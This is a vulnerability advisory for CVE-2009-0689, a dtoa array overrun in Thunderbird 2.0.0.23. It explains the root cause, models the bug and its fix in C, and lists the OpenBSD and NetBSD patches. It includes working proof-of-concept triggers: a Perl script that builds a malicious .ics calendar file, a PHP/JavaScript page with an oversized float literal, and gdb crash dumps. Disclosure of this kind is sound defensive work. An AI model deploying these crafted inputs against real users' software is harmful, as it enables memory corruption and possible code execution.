Thunderbird 2.0.0.23 Remote Array Overrun

Posted Dec 12, 2009
Authored by Maksymilian Arciemowicz | Site securityreason.com

Thunderbird version 2.0.0.23 suffers from a remote array overrun that allows for arbitrary code execution.

tags | exploit, remote, overflow, arbitrary, code execution
advisories | CVE-2009-0689
SHA-256 | 9a6a391941b200a19efd9a43cd84797f49e731b5b7c082401291e365c9294a3d

[ Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Thunderbird 2.0.0.23

Fixed in:
- Thunderbird 3.0
- Thunderbird 2.0.0.24pre

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/78


--- 0.Description ---
Thunderbird 2 includes many new features to help you manage your inbox.
With Thunderbird 2, it's easier to prioritize and find your important
email with tags, and the new find bar helps you find content within your
email faster.
Lightning brings the Sunbird calendar to the popular email client,
Mozilla Thunderbird. Since it's an extension, Lightning is tightly
integrated with Thunderbird, allowing it to easily perform email-related
calendaring tasks.


--- 1. Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code execution) ---
The root cause is in the dtoa implementation. Thunderbird ships the same
dtoa code as Firefox and the other Mozilla products, so the problem also
affects many Thunderbird add-ons that hand attacker-controlled numeric
strings to it.

Examples of affected add-ons:
- Lightning 0.9
- Thunderbrowse 3.2.6.7
- others

It is the same issue as SREASONRES:20090625:

http://securityreason.com/achievement_securityalert/63

but the fix for SREASONRES:20090625 used by OpenBSD was not sufficient.
More information about the OpenBSD fix and similar ones is in SREASONRES:20091030:

http://securityreason.com/achievement_securityalert/69

A floating-point literal with an arbitrary number of digits can be
supplied, and parsing it ends up overwriting memory. Kmax is defined as
15 and the freelist array has Kmax+1 entries, but the dtoa functions do
not check the computed index k against Kmax, so freelist elements at
index 16 and above, past the end of the array, can be read and written.
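To make the index arithmetic concrete, the following C program is an added example; it is not code from the advisory, from SecurityReason or from Mozilla's dtoa.c. It reproduces the freelist index computation of dtoa's s2b() (digits packed 9 per 32-bit word, k the smallest power of two covering them) and the shape of Balloc()/Bfree(), so it can show that the digit counts used by the two PoCs below (296450 and 333333) land on k = 16 while freelist has only Kmax+1 = 16 slots, indices 0..15. The fixed variant follows the check that later dtoa.c releases added: k <= Kmax before touching freelist, and plain free() for larger Bigints. The struct layout is simplified and the digit-count helper stands in for the real parser; those parts are assumptions made for illustration.

```c
/* Added example, not code from the advisory or from Mozilla's dtoa.c:
 * a simplified model of dtoa's s2b()/Balloc()/Bfree() showing why a
 * decimal literal with more than 9 * 2^Kmax digits pushes the freelist
 * index k past Kmax, and how the bounds checks added in later dtoa.c
 * releases keep the freelist in range. The struct layout and the
 * digit-count helper are illustrative, not the real parser. */
#include <stdlib.h>
#include <stdio.h>

#define Kmax 15                       /* vulnerable dtoa.c: freelist[Kmax+1] */

typedef struct Bigint {
    struct Bigint *next;
    int k;                            /* freelist slot; maxwds == 1 << k */
    int maxwds;
    int wds;
    unsigned int x[1];                /* 32-bit words, 9 decimal digits each */
} Bigint;

static Bigint *freelist[Kmax + 1];

/* Mirrors the index computation in dtoa's s2b(): nd mantissa digits are
 * packed 9 per word and k is the smallest value with 1<<k words covering
 * them. Nothing here caps k at Kmax. */
int k_for_digits(size_t nd)
{
    size_t x = (nd + 8) / 9, y;
    int k;
    for (k = 0, y = 1; x > y; y <<= 1, k++)
        ;
    return k;
}

/* Vulnerable shape: Balloc() reads freelist[k] and Bfree() writes a
 * pointer to freelist[v->k] with no check that k <= Kmax. This model
 * reports the out-of-bounds index instead of performing the access.
 * Returns 1 if freelist[k] would lie outside the array, 0 if in range. */
int balloc_unchecked_oob(int k)
{
    return k < 0 || k > Kmax;
}

/* Fixed shape (as in later dtoa.c): only k <= Kmax touches the freelist;
 * larger Bigints come from malloc() and go back to free(). */
Bigint *balloc_fixed(int k)
{
    Bigint *rv;
    if (k <= Kmax && (rv = freelist[k]) != NULL) {
        freelist[k] = rv->next;
    } else {
        int x = 1 << k;
        rv = malloc(sizeof(Bigint) + (size_t)(x - 1) * sizeof(unsigned int));
        if (rv == NULL)
            return NULL;
        rv->k = k;
        rv->maxwds = x;
    }
    rv->next = NULL;
    rv->wds = 0;
    return rv;
}

void bfree_fixed(Bigint *v)
{
    if (v == NULL)
        return;
    if (v->k > Kmax) {                /* too big for the freelist: release it */
        free(v);
        return;
    }
    v->next = freelist[v->k];
    freelist[v->k] = v;
}

/* Run the fixed allocate/free path for a literal of nd digits.
 * Returns the k that was used, or -1 if malloc() failed. */
int parse_model_fixed(size_t nd)
{
    int k = k_for_digits(nd);
    Bigint *b = balloc_fixed(k);
    if (b == NULL)
        return -1;
    bfree_fixed(b);
    return k;
}

int main(void)
{
    size_t poc[] = { 296450, 333333 };   /* digit counts from the two PoCs */
    printf("in range up to %zu digits (k <= %d)\n", (size_t)9 << Kmax, Kmax);
    for (size_t i = 0; i < 2; i++) {
        int k = k_for_digits(poc[i]);
        printf("%zu digits -> k = %d, unchecked freelist[k] out of bounds: %s\n",
               poc[i], k, balloc_unchecked_oob(k) ? "yes" : "no");
    }
    return 0;
}
```

The threshold falls out of the arithmetic: 9 * 2^15 = 294912 digits is the largest mantissa that still maps to k = 15, so both PoC payloads only need to exceed that by a margin. In the unchecked code the read in Balloc() fetches a stale pointer from beyond freelist and the later Bfree() stores a heap pointer there, which is the write that corrupts adjacent memory; the fixed path never indexes freelist with k > Kmax.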


--- 2. Proof of Concept (PoC) ---

(PoC for Lightning )
-----------------------
#!/usr/bin/perl
# SecurityReason.com
# sp3x
# tested on WinXp SP3
#
# Writes test.ics, a well-formed iCalendar file whose SUMMARY field
# carries the decimal literal "0." followed by 296450 '1' digits.
use strict;
use warnings;

my $header = "BEGIN:VCALENDAR\n".
"PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n".
"VERSION:2.0\n".
"BEGIN:VTIMEZONE\n".
"TZID:Europe/Prague\n".
"X-LIC-LOCATION:Europe/Prague\n".
"BEGIN:DAYLIGHT\n".
"TZOFFSETFROM:+0100\n".
"TZOFFSETTO:+0200\n".
"TZNAME:CEST\n".
"DTSTART:19700329T020000\n".
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n".
"END:DAYLIGHT\n".
"BEGIN:STANDARD\n".
"TZOFFSETFROM:+0200\n".
"TZOFFSETTO:+0100\n".
"TZNAME:CET\n".
"DTSTART:19701025T030000\n".
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n".
"END:STANDARD\n".
"END:VTIMEZONE\n".
"BEGIN:VEVENT\n".
"CREATED:20091117T095214Z\n".
"LAST-MODIFIED:20091117T095217Z\n".
"DTSTAMP:20091117T095214Z\n".
"UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n";
my $s = "SUMMARY:0.";
my $expl = "1" x 296450;          # the oversized float mantissa
my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T110000\n".
"DTEND;TZID=Europe/Prague:20100111T120000\n".
"END:VEVENT\n".
"END:VCALENDAR\n";

# '>' (truncate) rather than '>>' so a second run does not append a
# second calendar to the same file.
open(my $fh, '>', 'test.ics') or die "cannot open test.ics: $!";
print $fh $header.$s.$expl.$footer;
close($fh) or die "cannot close test.ics: $!";
-----------------------

(PoC for Thunderbrowse )
-----------------------
<script>
var a=0.<?php echo str_repeat("1",333333); ?>;
</script>
-----------------------

When this page is opened with Thunderbrowse, Thunderbird crashes with:

Program terminated with signal 11, Segmentation fault.
#0 0xbb15d1e7 in ?? ()

eax 0x0 0
ecx 0xa 10
edx 0x0 0
ebx 0xbb16eb38 -1156125896
esp 0xbfbfce58 0xbfbfce58
ebp 0xbfbfce74 0xbfbfce74
esi 0xb 11
edi 0xb768e700 -1217861888
eip 0xbb15d1e7 0xbb15d1e7
eflags 0x282 [ SF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0xab 171
gs 0xb3 179

(gdb) x/x ($eip)
0xbb15d1e7: Cannot access memory at address 0xbb15d1e7
(gdb) x/x ($esi)
0xb: Cannot access memory at address 0xb
(gdb) x/x ($edi)
0xb768e700: 0x1c71c71c

Here esi = 0xb and the memory edi points at is filled with the repeating pattern 0x1c71c71c:

(gdb) x/20x ($edi)
0xb768e700: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb768e710: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0xb768e720: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0xb768e730: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb768e740: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7

(gdb) x/50x ($edi)+37000
0xb7697788: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0xb7697798: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0xb76977a8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb76977b8: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0xb76977c8: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0xb76977d8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb76977e8: 0xc71c71c7 0x91c71c71 0x0b76d741 0x1af63420
0xb76977f8: 0x7c6568c4 0xd74952a1 0x552d1c87 0x4018081a
0xb7697808: 0xcb313ca6 0xd16c5484 0x36d13467 0x130c4b7d
0xb7697818: 0x92c1d06c 0xf70d9591 0x56bea87c 0x7c7bcc44
0xb7697828: 0xe6dd415d 0x210c53a8 0x482d162b 0x6d39c1c9
0xb7697838: 0x478f5fb2 0x9d6a2f46 0xe8b20d52 0xb012aa49
0xb7697848: 0xd75822f6 0x83ebbe5a


--- 3. SecurityReason Note ---
Officially, SREASONRES:20090625 has been confirmed in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock

This list is not yet complete.


--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c


--- 5. Credits ---
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.


--- 6. Greets ---
Infospec p_e_a pi3


--- 7. Contact ---
Email:
- cxib {a.t] securityreason [d0t} com
- sp3x {a.t] securityreason [d0t} com

GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- http://securityreason.com/key/sp3x.gpg

http://securityreason.com/
http://securityreason.pl/

